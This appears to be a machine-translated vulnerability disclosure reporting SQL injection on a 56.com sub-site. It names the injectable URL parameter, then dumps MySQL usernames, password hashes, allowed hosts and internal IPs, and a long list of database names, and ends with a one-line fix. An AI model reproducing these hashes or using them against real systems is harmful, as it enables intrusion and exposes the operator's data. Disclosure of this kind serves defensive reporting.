Brief description: multiple sub-station databases may leak their account and password.
Details: This injection is dangerous and contains too many sensitive content.
Proof of vulnerability: http://sml.56.com/index.php? Act = show & Pid = 56
Database account password
51tv_php * 8A43D2A0EFC7C4883CCA541A84E53ED9BE42AC30 61.146.192137
58bb520 * 0CA4B76111274A44D0E41142BA85899CBD8B095B localhost
Azi * 2A032F7C5BA932872F0F045E0CF6B53CF702F2C5 localhost
Chenzhx * b1461c9c68afa1129a5f968c3436192a084adb localhost
Dbbak * 5427e0f8ee2108c9cd1a800449920bbae77142ad 172.16.215.0/255.255.255.0
Dbbak * 5427e0f8ee2108c9cd1a800449920bbae77142ad 172.16.215.121
Liangjb * 93455291DB054B12B35F94BEB2DF32ED784D0C35 localhost
Onesec * 702F73B37142953BDF979B46F838E8E7FFB239C4 172.16.215.0/255.255.255.0
Onesec * 702F73B37142953BDF979B46F838E8E7FFB239C4 localhost
Rebill * 6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 localhost
Root localhost
Root localhost. localdomain
Seamaid * ed5da-a2b34c040776096db81fff1a17b9af447e localhost
Spec_php * 20EE3752A62E7B3E4BF2A6B53607B0F95FD12387 172.16.215.%
Spec_php * 20EE3752A62E7B3E4BF2A6B53607B0F95FD12387 61.142.208.0/255.255.255.0
Spec_php * 20EE3752A62E7B3E4BF2A6B53607B0F95FD12387 172.16.215.0/255.255.255.0
Spec_php * 20EE3752A62E7B3E4BF2A6B53607B0F95FD12387 172.16.215.13
Suxinning * Route 573960f2171730e6a38e6a32c75b8470b6b1a localhost
Wuwei * 7860837416FF2F245F77419A564C5E853FC2DFDF localhost
Query databases of multiple Substations
Cooperate_sml
Information_schema
08 live
56pro
56sys
DNF
EQ
Active
Alan
Baby61
Biye09
Brand
Broadcast
C2C
Chjh3
Cooperate
Cooperate_2008
Cooperate_51tv
Cooperate_anycall
Cooperate_backkom
Cooperate_bbsee
Cooperate_beauty
Cooperate_dance
Cooperate_ddt
Cooperate_dgch
Cooperate_doufaxiuxianjian
Cooperate_fun
Cooperate_gamech
Cooperate_gjqt
Cooperate_gtj
Cooperate_happy_castle
Cooperate_hhsh
Cooperate_icinemec
Cooperate_jxqy
Cooperate_kdjl
Cooperate_mcsd
Cooperate_mlxt
Cooperate_mr_top
Cooperate_muchang
Cooperate_pkcar
Cooperate_pkfzl
Cooperate_pmjx
Cooperate_puke
Cooperate_rxsg
Cooperate_rxxy
Cooperate_rxzt
Cooperate_sgfy
Cooperate_sml
Cooperate_sydh
Cooperate_tdyx
Cooperate_torch2008
Cooperate_tvb
Cooperate_wlyx
Cooperate_wulin
Cooperate_wztx
Cooperate_yqcm
Cooperate_zgch
Cooperate_zsg
Coopertire
Coopv_021215
Coopv_021216
Coopv_ask_and_answer
Coopv_foto
Coopv_hunantv
Coopv_huodong
Coopv_huodongutf8
Coopv_mingxing
Coopv_top
Copyright_admin
Disney
Disney_1
Dvman
Dvman1
Fcwr2011
Fiesta
Foto
Game
Happy
Solution: Filter characters